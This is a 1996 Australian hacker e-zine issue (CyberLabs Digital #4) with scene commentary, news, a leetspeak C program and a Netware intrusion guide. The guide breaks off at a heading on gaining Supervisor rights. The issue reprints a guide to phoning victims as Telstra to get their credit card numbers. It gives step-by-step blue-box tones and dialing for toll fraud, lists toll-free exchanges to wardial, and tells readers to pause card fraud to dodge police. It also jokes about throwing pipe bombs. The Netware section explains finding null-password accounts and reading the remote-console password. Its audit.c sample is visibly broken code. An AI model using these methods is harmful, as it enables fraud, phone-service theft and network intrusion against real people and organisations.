Copy Link
Add to Bookmark
Report
CyberLabs Digital Issue 04
-= Issue #4 14/8/96 =-
THE PROFESSIONAL EDITION
._---°--------------------------------------------------------°-_.
| [-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-cREW-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-] |
| BlackHaze EDiTOR |
| Diceman C0-EDiTOR |
| MR MiLK NEWS |
| R|[o[HeT DiGiTaL k0URiER |
| LSD CHa0S C0DER/WRiTER |
| [-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å--WRiTERS-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-] |
| |
| Myst |
| aCiD XTReMe |
| MiNDWaRP |
| JET BLACK |
| PAiN_HZ |
| |
| [-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-C0NTACT-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-] |
| SUBSCRiPTiONS: bend@st.nepean.uws.edu.au |
| SUGGESTiONS/SUBMiTTING ARTiCLES: bhaze@fl.net.au |
| diceman@fl.net.au |
| [-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-] |
| KN0WLEDGE iS N0T A CRiME |
'----° CyberLabs Digital °---------------------------------------'
.____________________________________________________________________________.
-= Preface
Welcome To CyberLabs Digital issue #4. Alot has undergone since previous issues
of CLD, we have gathered up new crew & now have a permanent home on #security
on OzNet. Not only have we strived to bring you with quality HP articles this
issue, but we are trying desperately to unite the HP scene within Australia as
we feel that time has come.
As you have already noticed, one major change is the removal of the reader.
And yes is was cruddy, so from now on CLD will be sent out in ascii. Before
I forget to mention, diceman has taken over as co-editor!
In the covers of this issue, we have included a k-rad codez ;>, a netware
security article, a phreaking article on phreak, a story on the life, an
article on scanning, and finally a Java segment, amongst others.
An almighty thanks to all who contributed. Blah, enough said let issue 4
begin!
BlackHaze & Diceman
.____________________________________________________________________________.
-= C0NENTS
1. Subscribe ........................................... <CLD Staff>
2. Disclamier .......................................... <CLD Staff>
3. Unite The Scene ..................................... <Bhaze/Diceman>
4. CLD News & Views .................................... <Mr_Milk>
5. Elite Speak ......................................... <BlackHaze>
6. Netware 3.1x/4.x Uebercracker Tips and Resources .... <Diceman>
7. Perl Exploit ........................................ <Diceman>
8. Scanning Made Easy .................................. <Myst>
9. OzPhreakin' ......................................... <aCidx>
10. #SECURiTY lame & weird quotes ....................... <#security>
11. The Basics of Sniffing .............................. <MindWarp>
12. Getting Trashed By The Cops ......................... < ANON ;) >
13. Java Security - Does Suns new language promise
security risks on the Internet ...................... <BlackHaze>
14. neXt iSSUE .......................................... <CLD Staff>
.____________________________________________________________________________.
-= SUBSCRiBE =-
If you would like to subscribe to CyberLabs Digital Inc. Just follow these
instructions:
1. Send an email to "bend@st.nepean.uws.edu.au".
2. Leave the "Subject:" field of the email 'CyberLabs Subscription'
3. The first line of your email should read:
SUBSCRIBE CYBERLABS DIGITAL <your name here and email address>
.________. _____________________________________ ._____...
| G R E E | Z
|
| =- Mr Milk, Diceman, Nemesis, NiCkY, VOiD, Shaman -=
| =- Frog, Myst, Freedom, Stux, aCidx, Tusker, TWiliGHT -=
| =- Fusion, Data King & all the #security ppl on OzNet -=
'______________________________________________________________..
-= DiSCLAMiER
Blah.
- CLD Staff
-= Unite The Scene
-= By: CLD Staff
What was the last Australian hacking or phreaking home page you visited ?
The chances are that over 90%+ of information resources that you use as a
hacker or phreaker will have come from the US. We constantly hear the question
"I have read all the US phreaking articles, does it work here ?". At one point
in life everyone is a newbie, information does not need to be handed on a
silver platter, but as it stands there is little Australian related information
available. fourtannly there still stands many HP related boards in Oz, few
carry a substantial amount of information & the ones which do you must have
access.
Have you noted that there appears to be no Australian HP scene ?
The scene has always been there, only thing you had to look hard. Recent events
such as movies like 'HACKERS' have spawned newbies in their hundreds into
the scene. Media hype also plays an important role into how the scene is
influenced peoples interested. As many of us can see, the more active the
scene is the better!
With the HP scene slowly on an increase, so to is the rapid growth of the
warez scene. This is a pity to see & many of the k0uriez do nothing to
contribute to the HP scene, other than leech commercial software thinking
they are elite & carry huge egos'. CLD does not hold anything against the
mass of warez groups within Oz, we would just like to see them somewhat
aid in lifting the HP scene off the ground for good.
Whether you have been at it for years or are just starting, everyone needs
information sources. We at CLD will strive to bring an important part of
this to you. CLD is not only about H/P, it is about researching topics and
building knowledge. We implore you to write your experience's down or part with
some of your knowledge, so that we will inturn achieve a greater technical
level within our articles. The end result of this can only be more knowledge.
CLD has moved through three issues. As each issue passes, the technical
content has improved significantly. It can be see that CLD is growing in
many ways and we the editors hope that the readers will also grow with us. Now
is the time for people to share their ideas, to grow with each other.
The time is near for the HP scene to unite, we will be there aiding the scene
& hope you will join us in the long road ahead...
Cheers,
BlackHaze & Diceman
Editor/Co-Editor
.____________________________________________________________________________.
-= CLD NEWS & ViEWS
-= By: Souprd00d aka Mr_Milk & the CLD crew
Alrighty then...
I guess this is really the first news section that will
actually occupy more than a couple of lines. I decided that CLD needed a
decent section to cover little tidbits and other stuff like that. Hopefully
it will turn out ok. If you have any recent news relating to Aus HPA then
mail it to me at edjjs@alinga.newcastle.edu.au, and I will make sure it gets
printed here.
****/ KUA stamps Authority on AUS scene \***
(NOT!)
A couple of underground boards started cropping up as KUA distro's.
KUA are a supposed HPA group with the members Mr Hacker, HandS and Gothik.
Sound interesting?.... a HPA group in Australia too good to be true? yeah
probably . After checking out some of there releases with some of the #security
guys I found myself laughing as I had never laughed before. The topics were
covered in a couple lines and everything was so vague and in descriptive (My
cat is a more elite hacker then you). Dont believe me? ok I will include a
golden example of what KUA is and about.
----------------------------------begin KUA Gold----------------------------
How To Get VALID Credit Cards In OZ
===================================
Ever wonded how people got all the VALID credit card numbers from? Ok read on!
first ya get your white pages (or fonedisk) out and find a target :)
ring up the guy, and tell him/her ya r calling from Telstra and the billing
computer had crashed so all the info is lost, then ask him/her wat method
they used 2 pay for the fone bill last time, if they said Credit card then
say "Can I have the number and the expire date again please" they will normally
give it 2 ya.. so here ya go just got ya self a card..
umm thats it.. be careful and *** DO NOT *** spread this file 2 any public
or little lame board, I dont want some little lamers 2 know this!!
How To Rip Off A Slot Machine
=============================
theres a button at the back of poker machines which you press and it gives you
a jackpot (usually red or black) i presume its there to get all the money out
of the machine.
-Gothik & Mr Hacker-
KUA'96
----------------------------------end KUA Gold---------------------------------
[ed note: wow, KUA is thriving from such intelligence. NOT! Why not send KUA
a friendly little email... heheh, we know we will :) wup@ozemail.com.au]
Ok that was the ever popular credit card number/Slot Machine article as you
can see it is streaming with depth and creativeness. If you think I am flaming
KUA as a group then you are mistaken. Australia needs hacking groups but you
need to ask yourself do we need groups like KUA with obvious minimal ability? Well
anyway whilst they are around I WILL continue to read there stuff not because
I will learn but because I will laugh everytime they write another article...
WAREZ anyone? :>
-- Western Australian
Reporter: Peter Morris
AUSTRALIA'S 2.7 million analogue mobile phone users risk having their accounts
electronically stolen and bills in their names rung up for thousands of dollars,
according to two perth men.
According to Telstra, the pair ran up a bill of more than $15,000 on an Adelaide
man's mobile phone over a six week period. Telstra has described it as
Australia's worst case of phone fraud.
The pair, Bob and Richard ( not their real names ) aged 20 and 19, say they
hacked into the mobile phone analogue network - a process known as phreaking -
"to prove how insecure the network is".
They "stole" the electronic signature from Adelaide signwriter Murray Goodes'
phone by modifying their own analogue phone to scan the network and catch the
electronic serial numbers (ESN) on to a computer as they were broadcast.
Using an old analogue phone and computer, together with freely available
software, the ESN was then programmed into the phone to enable it to access the
network masquerading as Mr Goodes' phone.
Bob and Richard say they were motivated by anger at Telstra's constant assurances
that the analogue network was secure.
"We were interested in how long it would talk for Telstra to track us down. If we
wanted to avoid getting caught, it would have been very easy to cover out
tracks," Richard said.
The analogue system is the older of the two cellular phone networks operating in
Australia. The Federal Government has announced it will be closed by the end of
the century.
Mobile subscribers are being encouraged to use the newer and more secure digital
network. Suppliers say demand for analogue mobile phones has slowed dramatically
this year.
Telstra spoakswoman Lesley Tannerhill said consumers should be aware that the
potential for phreaking was limited to the analogue network and the company was
able to detect it.
She said customers whose phones were misused would not be liable for the bill.
Bob and Richard said thay chose to steal a number from an Adelaide based
subscriber so it was clear to Telstra that Mr Goodes was not responsible for the
calls and so would not be forced to pay the bill.
Mr Goodes said he has been assured by Telstra that he would not be held liable
for the $5333 bill he received, more than $5000 over his normal monthly account.
As a sole proprietor he said he was dependent on the mobile phone for work and
there had been a noticeable drop-off in business last month - he estimated a 60
per cent fall.
"I dont think they understand the damage they can do to people's business," Mr
Goodes said.
Bob and Richard used the phone freely for six weeks before being raided by the
Australian Federal Police about two weeks ago. No charges have been laied.
They used the phone about 18 hours a day, mostly calling overseas including sex
chat lines in Israel.
Easy picking for security experts
---------------------------------
TO THE casual observer, Bob and Richard look like a couple of successful
20-somethings: well-dressed and easily able to supplement their bachelor eating
habits with regular splashes at expensive restaurants.
The outward appearance accurately reflects their professional lives as computer
security consultants whose skills are so highly sought-after they have the
potential to earn well over $100,000 a year.
"We work pretty much how and when we want," Richard said.
Both started university but left in the first year when they found the learning
experience on campus too slow.
They see phreaking (getting free use of telephones) and hacking into computer
systems as inextricably linked.
Having developed a childhood fascination with the technology, they now see
hacking as the fastest way to keep updating their skills.
And while there may be a great deal of scepticism among computer system operators
about their motivation, Nick Chantler, an army counter-intelligence instructor
who has completed a major study of hackers, said this thirst to learn more about
systems was common.
"The vast majority of them are not evil, they just want to increase their
knowledge," he said.
But he said sometimes this enthusiasm could overwhelm their ethical constraints.
After years researching hackers, Dr Chantler has enormous respect for the
knowledge and ability elite hackers have, something he believes many big
organizations are completely blind to.
"There is nothing they can't do if they set their minds to it," he said. "The
elite hackers could bring Australia to its knees."
He said that throwing the book at phreakers and hackers was not the answer
because of the damage they could wreak.
"What I would be doing with these guys is to quietly pull them aside and try to
learn as much as I could about what they know," Dr Chantler said.
Pipe Bomb explodes in boys hand
-------------------------------
I was watching WIN television one night while on IRC, why the hell i was watching
WIN i don't know! And as usual the 10:45 news appears, and low and behold
Pipe bomb explodes in boys hand...
Stunned, i turned around & watched the news and to my utter amazement i was
shocked at how lame this teenager was... using a hammer with a pipe bomb? wow,
that just proves his vast intelligence HA. Not only did the media over hype this
story they also had to relate it to the bomb blast in Atlanta. Now as usual the
media needed a ground-breaking story, so of course what do they do is
The internet is to be blamed, as files on illegal bomb construction can be found.
By this stage I was furious, i felt like physically driving down to the scene &
lob a few hundred pipe bombs outa my cars window, while yelling 'This is how you
make a pipe bomb lamer!' whilst several WIN camera men are sent flying throw the
air.
I guess that some looser of a politician will bring the matter up in parliament
it will be a great surprise if any action will be actually taken, besides they
can't do a simple thing. Well let's hope not.
Anyhow, we find that constructing pipe bombs one of the most dumbest things, &
always the lamers are the ones who find themselves fuqd' up in the end. Along
with all the try-hard Anarchist groups within Oz & lamers bragging about how damm
gewd they are at constructing explosives, there's no hope :)
049 gets busted, well almost!
-----------------------------
During last month ( maybe this month too) Federal Police were in Newcastle
to help local ISP's (hunterlink) and national Point-Of-Presense's
(ozemail access1 etc.) riddle out credit card fraud. Obviously with the
easiness of fake accounting something would need to be done to weed them out.
No arrests have been made yet involving credit card fraud on the ISP but I
guess it will only be time before some WaReZ kiddie goes down. So just a
warning anyone using Newcastle ISP's or even anyone in NSW lay off the credit
cards for a while at least as the beer gut bad boys are in town.
One person has been arrested already regarding ordering $1000 of goods
from a local store from a fake credit card that he got from the Internet. This
is what initially started the interest in credit card fraud.. I am sure the
Fedz will be looking for more heads so dont let it be you.
Sticking with credit card fraud there are enormous rumors that Ozemail
have the Fedz helping them catch kiddies using fake cc#'s. So again lay off
with the fraud for a while.
Boards springing up over the country
------------------------------------
A large number of HPA related BBS's are starting to crop up. Although alot
only have a minimal filebase and no decent msg areas going it is good to
see that an underground is starting to form. If you are a sysop of a HPA
related BBS, keep going and keep putting in an effort to make your bbs elite.
The Blue Box Myth
-----------------
I am sick and tired of hearing on irc that Blue Boxing in Australia is dead.
Sure most of Australian telephone switching system is already converted to
digital and it is impossible to blue box within Australia. HOWEVER the way
to successfully blue box in Australia is too first call another country that
has a shithouse phone system and bad connection to Australia. You call another
country using the 1800 country direct numbers (1800 881 ***) these will connect
you to another country's fone exchange for FREE. Alright most are robotised
and allow you to make calls using a calling card or some even a credit card
you can bail out now and just use your fake cc #'s etc to dial back into
Australia for free calls. However if you dont want to get caught easily you
can blue box your way back into Australia. To do this you will need a tone
generator, scavenger is a good start.. or even BlueBeep will do. Ok set up
a simple two tone sound of 2400+2600 and then 2400... I will leave the timing
and volume up to you... but after you hear a chirp when dialing the country
direct number you send the seize tones down.. you should hear the tones played
back to you... if this is the case you have a successful seize and all you
have to do is usually dial KP2+country code+0 + number + ST and it will work.
If it hangs up on you when you play the tone, it means that the timing is too
long and you should adust it. Also volume is important so tweak away with it
as well.
So it is possible to blue box within australia you just have to use a
cheap country like Aruba to help you on your way.
SUMMARY:dial country direct to distant country.
seize line
dial back in Australia
Hacking in Australia
--------------------
There are many 1800 numbers that be scanned with a program such as ToneLoc or
TheScan. Good exchanges to start on are the 1800 801 *** and 1800 124 ***.
These have many carriers and can be a good starting point.
These are all Carriers and contain some decent computers. Have a look and see
them for yourself... hey they arent costing you anything.
CONCLUSION:
Ok that wraps up my first attempt at a news article... so hope you
liked it etc. and I will catcha in the next issue. Remember the Aus HPA scene
needs you to grow!
.__________________________________________________________________________.
Elite Speak should compile under any unix platform or PC. You will have to
call ExitToShell() rather than exit() to compile under SIOUX ansi c.
/* Elite Speak
Author: CLD Crew - bhaze@fl.net.au
Date: 8/13/96
Version: 1.1
Usage:
> type the required text here
>> +Yp3 +h3 R3qu1r3d +3x+ h3R3
*/
#include <stdio.h>
int upper(char pass)
{
if((pass <= 89) && (pass >= 66)) return 1;
else return 0;
}
int lower(char pass)
{
if((pass <= 122) && (pass >= 97)) return 1;
else return 0;
}
void main(void) {
int ChangeToUpper = -32, ChangeToLower = 32;
int HE = 69, HO = 79, HI = 73, HS = 115, HT = 116;
int H1 = 49, H3 = 51, H0 = 48, H5 = 53, Ht = 43;
char buffa[100];
int NumOfChars = 0,count = 0,scuz = 0;
printf("\n");
printf("3L1+3 5p3Ak V3r510n 1.1 - By th3 CLD cr3w bhaze@fl.net.au \n \n");
printf("> ");
do {
buffa[NumOfChars] = getchar();
NumOfChars++;
} while((NumOfChars < 100) && (buffa[(NumOfChars - 1)] >= 32));
NumOfChars--;
printf("\n");
printf(">> ");
while(count < NumOfChars) {
if((buffa[count] == HE) || (buffa[count] == (HE + ChangeToLower))) {
buffa[count] = H3;
}
if((buffa[count] == HO) || (buffa[count] == (HO + ChangeToLower))) {
buffa[count] = H0;
}
if((buffa[count] == HI) || (buffa[count] == (HI + ChangeToLower))) {
buffa[count] = H1;
}
if((buffa[count] == HT) || (buffa[count] == (HI + ChangeToLower))) {
buffa[count] = Ht;
}
if((buffa[count] == HS) || (buffa[count] == (HI + ChangeToLower))) {
buffa[count] = H5;
}
if ((scuz == 1) && (upper(buffa[count]))) {
buffa[count] = buffa[count] + ChangeToLower;
}
else if ((scuz == 1) && (lower(buffa[count]))) {
buffa[count] = buffa[count] + ChangeToUpper;
}
if (scuz < 3) {scuz ++;}
else scuz = 0;
printf("%c",buffa[count]);
count++;
}
printf("\n");
getchar();
exit(0); //ExitToShell <--- Use for SIOUX ANSI C.
}
.____________________________________________________________________________.
Diceman's Netware 3.1x and 4.x Uebercracker Tips and Resources
==============================================================
by diceman@fl.net.au
CONTENTS
========
Getting a feel for the Network
Netware Three
Netware Four
How a Uebercracker gets Supervisor rights
How a Uebercracker keeps his rights
Where are those error logs and what do they log ?
A listing of utilities to penetrate Novell Netware - some of the things that
are possible.
==============================================================================
This was written at the beginning of 1995, as a reference guide for
myself. Since then it has not been updated, due to the fact that i have moved
to unix. Despite this, to all the die hard unix hackers the fact is that
88% of the top 1000 fortune companies use novell netware, that counts for
something ;>.
I have tried to include original information, which has succeeded to a degree.
The introduction to netware security, is i believe to be a first.
Also this file contains no specific version 4 hacking, thus its usefulness
maybe limited. Note that it is still an excellent reference for people new to
netware.
Obviously, information has been taken from sources, credit has been intended
to be given. A special note for the Netware Hacking FAQ by Simple Nomad is
in order.
==============================================================================
Getting a feel for the Network
==============================
1. NETWARE THREE
================
How many servers are there ?
----------------------------
It is always good to know how many servers there are on the network you are
on. The simple command "slist" will perform this, you do not need to be logged
in. The file should usually be held at sys:login\slist.exe. Notice in the
status column that servers can be default and attached, if you are logged into
the network.
Here is the output :
Known NetWare File Servers Network Node Address Status
-------------------------- ------- ------------ ------
ECHIDNA [ A0001][ 1]Attached
HAKEA [ FACA][ 1]
MELAB [ BAD1E][ 1]
MEOFF [ D1ED][ 1]
MOFF [ 2][ 4]
MOTHER [ FADED0][ 1]
NURSING_1 [ 256][ 1]Default
PDU [ 30A][ 1]
PRFMIS [ BEAD1][ 1]
RECORDS [ ABBA][ 1]
SERVER1 [ 1B0000][ 1]
[Snip]
Total of 35 file servers found
The Login Script
----------------
This file the "login script" is processed by everyone who logs into the
network as apposed to attaching. It is held at sys:\public\net$log.dat. This
file is in clear text, and if you have the rights, can be edited. The file
often shows batch files that will be processed by certain users. It is good to
review these files to see how the network is managed and what programs are
loaded.
Notice the "exit" at the end of the file. If this command is not issued, then
individuals can utilised personal login scripts.
Here is an example (my creation ;>):
pccompatible
map display off
rem ---------------------------------------------------------------------
rem User drive mappings
map errors off
if member of "lockout" then exit "lockout"
if login_name is "supervisor" then begin
map r j:=sys:user\other
else
map r j:=sys:user\%login_name
end
map errors on
rem ---------------------------------------------------------------------
rem Other mappings
map f:=sys:default
map r m:=sys:data
map r INS s1:=sys:public
map r INS s2:=sys:programs\%smachine\%os_version
map r INS s3:=sys:std
comspec=s2:command.com
rem --------------------------------------------------------------------
rem Special logins
if login_name is "PRINTER" then exit "prn-user"
if login_name="FAXHQ" then exit "faxhq"
if login_name="ANYWHERE" then exit "pcany"
if login_name="backup" then exit "emerald"
if login_name="asc" then exit "command /c asc"
rem ---------------------------------------------------------------------
rem Start screen displays
write
write "Good ";greeting_time;", ";full_name;"."
write "It's ";day_of_week;", ";day;" ";month_name;", ";year;", and the time is
";hour;":";minute;" ";am_pm;"."
write "You are now logged on at station ";station;"."
write
set prompt = "$P$G"
set name = "%LOGIN_NAME"
set wp51name = "%FULL_NAME"
if member of "BTSG" then set BTS = "G1"
rem -------------------------------------------------------------------------
rem Set printer capturing
#capture l=1 q=printq_0 nt nb nff ti10
#capture l=2 q=printq_1 nt nb nff ti10
rem ---------------------------------------------------------------------
rem Special Group conditions
if member of "wbmas" then map q:=sys:wbmas
if member of "audit" then map k:=sys:audit
if member of "it" then exit "it"
exit "mlk"
The autoexec.ncf
----------------
The autoexec.ncf is one of the two startup files for the netware server the
other being startup.ncf. Here is one of my creations:
rem -----------------------------------------------------------------------
file server name hack
ipx internal net B00B
rem -----------------------------------------------------------------------
REM BINDING IPX TO THE ETHERNET BOARD
rem load ethertsm
load ne1000 port=300 int=3 frame=Ethernet_II name=hacknet
bind ipx hacknet net=1
rem -----------------------------------------------------------------------
REM BINDING TCPIP TO THE ETHERNET BOARD
load snmp
load tcpip rip=no
bind ip hacknet ad=129.1.0.3 ma=255.255.255.0
rem -----------------------------------------------------------------------
REM LOADING DISK DRIVERS
load isadisk port=1F0 int=E
rem -----------------------------------------------------------------------
REM MOUNTING ALL HARD DRIVES
mount all
rem -----------------------------------------------------------------------
REM LOAD A FEW LOGS - AFTER CLIB HAS BEEN AUTO LOADED BY TCPIP - AND SYS MOUNTED
load c:\server.312\conlog.nlm
load c:\server.312\snmplog.nlm
rem -----------------------------------------------------------------------
REM SECURITY
secure console
remove dos
set allow unencrypted passwords = off
rem -----------------------------------------------------------------------
REM LOADING BASIC NLMS FOR OPERATION
search add c:\server.312
rem load streams - AUTO LOADED BY TCPIP
rem load clib - AUTO LOADED BY TCPIP
load nut
load mathlib
load tli
load ipxs
load spxs
load remote remote
rem the above line sets the remote console (sys:\system\rconsole.exe) passwd
load rspx
rem load pserver pserver
load monitor P NH
rem -----------------------------------------------------------------------
REM LOAD ADD ON NLMS
search add c:\server.312\nlms
load eventmon -l sys:etc\eventmon.log -a
load nwshell
rem -----------------------------------------------------------------------
This is one of the most important files for the netware server. It could be
located in two positions. Either c:\server.312\autoexec.ncf (or similar) or
sys:\system\autoexec.ncf. This positioning is very important, due to the fact
that to access it on c: is alot harder than sys:. For example, the sys admin
has left himself logged in, a simple type sys:\system\autoexec.ncf to
retreive the rconsole password, thus all security levels have been breached.
The autoexec.ncf tells the netware server what nlms to load upon startup.
Note that conlog.nlm is loaded, this is describe below. Also eventmon, this
monitors all changes in the file system and the bindery.
Who are the users, and what is the structure of the groups
----------------------------------------------------------
By default every new user created on the novell network is added to the group
everyone. By entering the program "syscon" held usually at
sys:public\syscon.exe, a complete listing of users and groups can be found.
An easy way to get all the users and gourps to an ascii text file is through
the use of a thirdly party utils.
Use the utility grplist.exe to retrieve a listing of groups or a full listing
of users.
For example the command:
grplist {server}\everyone - provides a listing of all users in the group
everyone.
grplist - provides a listing of all users on a server.
Which users do not have passwords
---------------------------------
Login as any user. Use the utility "chknull" by itsme, this will return a
listing of users with null passwords.
02000002 0001 ANYWHERE HAS a NULL password
04000002 0001 ASC HAS a NULL password
2b000001 0001 MIDBACK HAS a NULL password
36000001 0001 PRINTER HAS a NULL password
3b000002 0001 TEMP HAS a NULL password
3e000001 0007 PSERVER HAS a NULL password
The pserver can not be logged into from the login prompt. To see what rights
these useid's have "attach {username}" instead of login. Beware is accounting
if installed.
Are the default accounts still in existance
-------------------------------------------
Upon installation Netware 3.1x creates two users:
Supervisor
Guest
What rights do I have
---------------------
It is important to see what rights your userid has. The commands "rights,
whoami and list" are particularly useful.
Rights - by itself tells the user what rights they have in the default
directory.
FS3\SYS:
Your Effective Rights for this directory are [SRWCEMFA]
You have Supervisor Rights to Directory. (S)
* May Read from File. (R)
* May Write to File. (W)
May Create Subdirectories and Files. (C)
May Erase Directory. (E)
May Modify Directory. (M)
May Scan for Files. (F)
May Change Access Control. (A)
* Has no effect on directory.
Entries in Directory May Inherit [SRWCEMFA] rights.
You have ALL RIGHTS to Directory Entry.
Whoami - normally tells the user which login id they are using. Whoami is also
useful to:
whoami /g - lists the groups you belong to
whoami /r - lists your effective rights in the network directory structure.
whoami /s - lists your security equivatants.
whoami /a - lists the groups, security equivalences, and your effective rights.
Tlist- displays the users trustee rights and their effective rights.
Listdir /e - displays effective rights of all subdirectories.
Ok what do these rights mean
The Eight Netware Rights
------------------------
S Supervisory: Once granted to a user or group on a specific directory, this
right gives the trustee holding it all rights, as well as the ability to grant
all rights to other users or user groups on that directory and its
subdirectoriesThe supervisory right itself is automatically propagated for the
trustee holding it to all subdirectories below the one where it was granted,
and it cannot be revoked for the trustee from subdirectories below the
original assignemtn. It also overrides any restricitions put in place by the
Netware Inherited Rights Mask.At the file level, it allows a user all rights
to the file - and the ability to grant or modify any right to any file for any
user or group in any directory at or below the directory where the supervisory
rights were assigned.
R Read: This right allows a user or group to open a file for reading or to run
an excutable program.
W Write: Allows a user or group to open and modify a files's contents.
C Create: At the directory level, Create allows a user or group to make
subdirectories and files within them. If this right is the only one granted at
the directory level, it allows the trustee holding it to create subdirectories
and files. But once a file is closed, it cannot be seen using standard DOS or
Netware commands( for example DIR or NDIR ).
E Erase: Controls whether or not a directory, its subdirectories and the files
within the directory and subdirectories can be deleted.
M Modify: Users or groups with this right have the ability to set and change
file or directory attributes. This includes renaming directories or files
within directories. This trustee right has no effect on the ability to modify
the contents of a file.
F File Scan: Users or groups must have this trustee right to see that
directories or files within directories exist.
A Access Control: This right allows a user to modify the trustee assignments or
the Inherited Rights Mask of a directory or file. It does not allow a user to
grant the supervisory trustee right, but it does allow them to grant trustee
rights to others that they themmselves do not have.
What Rights does it take to ?
-----------------------------
Rights for Common File and Directory Tasks
Read from a closed file Read
See a file name File Scan
Search a directory for file File Scan
Write to closed file Write, Create, Erase, Modify
Execute an EXE file Read, File Scan
Create and write to a file Create
Copy files from a directory Read, File Scan
Make a new directory Create
Delete a file Erase
Salvage deleted files Read, Write, Create, File Scan
and Create at directory level
Change directory or file attributes Modify
Rename a file or directory Modify
Change the Inherited Rights Mask Access Control
Change trustee assignments Access Control
Modify a directory's disk space Access Control
Who is currently logged in
--------------------------
The "userlist" command will reveal all. The command "userlist /a" will list
the ethernet addresses as well.
User Information for Server TEMP
Connection User Name Network Node Address Login Time
---------- -------------- -------- ------------ -------------------
1 SUPERVISOR [ 2] [ 80C7BD547A] 2-12-1997 1:59 pm
2 GUEST [ 2] [ 20E00EB486] 2-12-1997 10:26 am
3 FAXHQ [ 2] [ C06D7C4E] 2-08-1997 3:08 pm
[Snip]
42 PRINTER [ 2] [ C0707C4E] 2-12-1997 1:28 pm
43 BACKUP [ 2] [ 20E00E9B70] 2-12-1997 3:02 pm
44 TEMP [ 2] [ 20E00E3F33] 2-12-1997 2:06 pm
The utility getequiv.exe checks, a single user, all members of a group, all
users on a server, and lists all users, who have security equivalences to a
user or group.
Is Accounting Install
---------------------
To tell if accounting is installed as any user, load "syscon". Hit return on
"Accounting" and if you get the "Accounting Not Installed", or "Do you wish to
install accounting", then accounting is not installed.
Note that all accounting records are held at sys:\system\net$acct.dat. Access
to this directory is for only privilaged accounts.
Has TCP/IP been installed on the network
----------------------------------------
The in the sys:etc directory there are several files relating to other systems
that could be connected on the same ethernet. All can be edited with a
standard text editor, if you have sufficient rights, or using the edit NLM
from the console. Note lines with a comment (#) anywhere one the line are
ignored.
SYS:ETC\HOSTS: - maps host names to IP addresses.
It's format is identical to /etc/hosts on UNIX systems. A Hosts file entry has
the following format: IP_address, Host_name, [alias [..]].
#Mappings of host names and host aliases to IP address.
#
130.57.4.2ta tahiti ta.novell.com loghost
130.57.6.40osd-frog frog
SYS:ETC\NETWORKS: - maps network names to network addresses.
A Networks file has the following format: network_name, network_number, [alias
[ ...]]
#Network numbers
#
loopback127# fictitious internal loopback network
novellnet130.57# Novell's network number
SYS:ETC\PROTOCOL: - maps protocol names to IP protocol numbers.
The Protocol file contains information about the known protocols used on the
DARPA Internet network. A Protocol file has the following format :
protocol_name, protocol_number, [alias [..]].
#Internet (IP) protocols
#
ip0IP# internet protocol, pseudo protocol number
icmp1ICMP# internet control message protocol
tcp6TCP# transmission control protocol
udp17UDP# user datagram protocol
SYS:ETC\SERVICES: - maps service names to transport protocol/well-known port
pairs.
# Network service mappings. Maps service names to transport
# protocol and transport protocol ports.
#
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
#
# Host specific functions
#
tftp 69/udp
finger 79/tcp
link 87/tcp ttylink
#
# UNIX specific services these are NOT officially assigned
#
exec 512/tcp
login 513/tcp
shell 514/tcp cmd # no passwords used
printer 515/tcp spooler # experimental
2. NETWARE FOUR
===============
I do not have a netware four right here a the moment, so here is a listing
of commands that will be helpful but no outputs.
nlist server /b - Will provide a list of the bindery servers on your network
an information about the servers.
nlist server - provides a list of servers within the current NDS context.
nlist volume - views the file server volumes defined within the current NDS
context.
nlist /vol - gives more detailed info on the detailed volume.
ndir [path] /do /sub - shows information about the directories in the default
directory.
ndir [path] /a - used to view information about each file in the default
directory.
ndir [path] /r - view information about each file and directory in the default
directory. Shows more detailed info.
nlist user /a - a list of users logged into the current NDS context.
nlist user /b=[server name] - views a list of users defined to the specified
server. This is a recommeneded command.
rights [path] /t - used to view the trustee list of a file or directory in the
default or pathed directory.
nlist group - view groups within the current NDS context.
nlist organization show "login script" - view the login scripts of
organizations within the current NDS context.
cx /t /all - used to view the NDS tree within the current NDS context.
nlist organization show "detect intruder" - show the detect intruder settings
for the organizations with the current NDS context.
nlist group show "member" - view the groups defined within the current NDS
context and the members of each group.
Is auditing installed
---------------------
There has been a new feature installed with netware 4, the ability for an
auditor to independently supervise the network. Here is a "c" file that,
should show if auditing has been installed, as any user. I say should due
to the fact that i do not have the client api's to compile. If anyone does
compile this please send it to me.
/* audit.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <nwnet.h>
void FreeUnicodeTables();
void FreeContext(NWDSContextHandle context);
void main(void)
{
NWContainerAuditStatus dsStatus;
MWDSContextHandlw dContext;
NWCONN_HANDLE dsconnhandle;
NWOBJ_ID containerID;
NWCCODE ccode;
char nameContext[MAX_DN_CHARS + 1]="";
int countrycode, codepage;
countrycode = 001;
#ifdef N_PLAT_UNIX
codepage = 88591;
#else
codepage = 437;
#endif
ccode = NWInitUnicodeTables(countrycode, codepage);
if(ccode)
{
printf("\nNWInitUnicodeTables error\n");
exit(1);
}
dContext = NWDSCreateContext();
id(dContext == ERR_CONTEXT_CREATION)
{
printf("\nNWDSCreateContext error %X\n", dContext);
FreeUnicodeTables();
}
ccode=NWDSGetContext(dContext, DCK_NAME_CONTEXT, nameContext);
if(ccode)
{
printf("\nNWDSGetContext error %X\n", ccode);
FreeContext(dContext);
}
ccode=NWDSAuditGetObjectID(dContext, nameContext, &dsconnhandle, &containerID);
if(ccode)
{
printf("\nNWDSAuditGetObjectID error %X for object %s\n", ccode, nameContext);
FreeContext(dContext);
}
ccode=NWDSGetContainerAuditStats(dsconnhandle, containerID, &dsStatus,
sizeof(dsStatus));
if(ccode)
{
print("\nNWDSGetContainerAuditStatus error %X\n", ccode);
FreeContext(dContext);
}
printf("Audit is %s on %s.\n", (dsStatus.auditingEnableFlag ? "enabled : "disabled"),
nameContext);
FreeContext(dContext);
}
void FreeContext(NWDSContextHandle context)
{
NWDSFreeContext(context);
FreeUnicodeTables();
}
void FreeUnicodeTables()
{
NWFreeUnicodeTables();
exit(1);
}
How a Uebecracker gets Supervisor rights and a few tricks
=========================================================
